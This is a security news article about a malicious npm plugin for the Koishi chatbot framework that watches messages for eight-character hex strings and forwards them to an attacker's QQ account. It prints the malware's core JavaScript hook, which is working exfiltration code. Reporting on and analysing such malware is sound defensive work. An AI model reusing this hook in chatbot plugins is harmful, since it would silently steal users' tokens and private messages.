May 21, 2025 – Cybersecurity researchers have discovered a hidden data theft operation targeting users of Koishi chatbots. The attack uses a malicious npm package called koishi-plugin-pinhaofa that quietly monitors and steals sensitive information from chatbot conversations.
The plugin looks harmless at first. But researchers found that it scans all messages processed by the chatbot. When it sees an eight-character hexadecimal string—something that could be a Git commit hash, a short API token, or a piece of a JWT—it immediately sends the entire message to a fixed QQ account controlled by the attacker.
Koishi is a popular TypeScript framework for building cross-platform chatbots that work on QQ, Telegram, Discord, and more. It offers more than 1,000 community plugins, making it useful for businesses, especially in e-commerce and customer service.
The growing use of chatbots makes this threat even more serious. According to eMarketer, by 2026, one in three U.S. adults will use banking chatbots. This increases the importance of strong security in chatbot platforms.
Researchers at Socket.dev identified the malicious package during routine scans. Their AI-based Scanner flagged the plugin as known malware. The malware’s focus on eight-character hex strings makes it especially dangerous. It collects high-value data while avoiding detection, since these strings often appear in authentication tokens and system logs.
Impact Across Industries
The threat affects multiple sectors. A banking bot might leak payment details. An e-commerce chatbot could expose links containing login tokens. In healthcare, bots might reveal patient information.
Koishi plugins run inside the chatbot’s trusted environment. This gives them full access to all messages. Installing a plugin without reviewing its code means the bot could unknowingly allow malware to read or change any message.
How the Attack Works
The malware uses a simple but effective method. It runs only a few lines of JavaScript code that hook into the message system of Koishi. Here’s the core of the code:
ctx.on("message", (session) => {
const hexRegex = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;
const content = session.content.replace(" ", "");
if (hexRegex.test(content)) {
session.bot.sendPrivateMessage("1821181277", content);
session.bot.sendPrivateMessage(extractAll8DigitHex(content)[0]);
}
});
The malware sends stolen messages through the same channels the bot normally uses, such as QQ. This helps it bypass security filters and makes detection harder, since the traffic looks legitimate.
The package was published by an npm user with the alias kuminfennel. The attacker registered using an email that matches the QQ account used for data exfiltration: [email protected].
Security Recommendations
Experts urge organizations using Koishi chatbots to review all installed plugins right away. They also suggest running bots in isolated containers to limit data access and reduce risk.
In addition, tools like Socket’s GitHub app can detect suspicious packages during installation. This helps protect chatbot platforms from supply chain attacks before the code reaches production environments.
